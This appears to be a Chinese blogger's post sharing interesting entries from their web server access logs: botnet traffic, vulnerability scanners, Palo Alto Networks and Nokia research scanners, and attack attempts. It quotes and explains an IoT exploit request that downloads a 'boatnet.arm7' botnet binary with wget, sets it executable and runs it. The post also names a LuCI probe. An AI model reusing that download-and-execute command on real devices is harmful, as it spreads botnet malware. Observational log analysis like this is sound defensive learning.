开了一段时间服务器了 没装cloudfare 每天都能看好多的日志
下面是几个我遇到比较有趣的
僵尸大军
121.29.178.2X - - [04/Oct/2025:::06 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
58.212.237.24X - - [04/Oct/2025:::13 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
111.113.88.25X - - [04/Oct/2025:::08 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
121.29.178.13X - - [04/Oct/2025:::20 +0800] "GET / HTTP/1.1" 200 59060 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) 来自各个IP段的可怜的僵尸网络过境我的主页 但是我主页并没有什么东西唔
🛒 自动化漏洞扫描
- 行为: 2秒内尝试20+种不同系统的管理界面
- 扫描目标:
- WordPress插件 (6种)
- 数据库管理 (phpMyAdmin)
- 微服务系统 (Nacos)
- 企业系统 (用友CWbase)
- 状态: 97%返回404,完美阻断
学习点: 现代扫描器会系统性探测所有常见服务路径
有意思的爬虫
92.119.36.14X - - [04/Oct/2025:00::00 +0800] "POST / HTTP/1.1" 200 12077 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
92.119.36.11X - - [04/Oct/2025:00::01 +0800] "POST / HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"
92.119.36.10X - - [04/Oct/2025:00::02 +0800] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"
92.119.36.15X - - [04/Oct/2025:00::03 +0800] "POST / HTTP/1.1" 200 12077 "-" "python-requests/2.32.3"666 <play>withme</>
一些互联网企业
Palo Alto Networks(派拓网络)的官方安全扫描器
<br>62.216.149.18X - - [05/Oct/2025:::43 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 138 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"<br>205.210.31.X - - [05/Oct/2025::29 +0800] "GET / HTTP/1.1" 301 5 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"<br>205.210.31.X - - [05/Oct/2025::29 +0800] "GET / HTTP/1.1" 200 12077 "http://--我的网址不给你们看--/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"<br><br>- 行为: 访问首页进行安全评估
- 特色: User-Agent中直接表明身份并提供文档链接
- 状态: 200 OK – 正常响应
“Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity”
学习点: 顶级安全公司的扫描是透明、合规的互联网普查
诺基亚的扫描器
216.180.246.18X - - [04/Oct/2025::56 +0800] "GET / HTTP/1.1" 200 12077 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.18X - - [04/Oct/2025::33 +0800] "GET /favicon.ico HTTP/1.1" 404 138 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'可恶的攻击者
物联网漏洞攻击者
144.172.100.17X - - [04/Oct/2025::04 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F103.77..50%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1" 404 138 "-" "Mozilla/5.0"攻击流程
- 步骤1: “cd /tmp # 进入临时目录”,
- 步骤2: “rm boatnet.arm7 # 删除旧版本(如果存在)”,
- 步骤3: “wget http://103.77.—.50/hiddenbin/boatnet.arm7 # 下载恶意软件”,
- 步骤4: “chmod 777 * # 给所有文件执行权限”,
- 步骤5: “./boatnet.arm7 tbk # 执行僵尸网络程序”
**学习点**: 物联网设备是僵尸网络的重要目标,保持系统更新很重要
执着的攻击者
7.60.141.15X - - [04/Oct/2025::59 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 138 "-" "-"这个攻击者已经尝试用LUCI漏洞攻击两次了 我真的不是物联网设备
其他漏洞攻击
wordpress漏洞 .git漏洞 后门漏洞 XML漏洞 还有好多好多... 每天这种经典漏洞攻击不下百次唔小计
每天能看到我的网站人来人往感觉挺不错的 虽然不是正常的访问者 感觉每天看日志我都能识别他们要干嘛了 也算是一种学习吧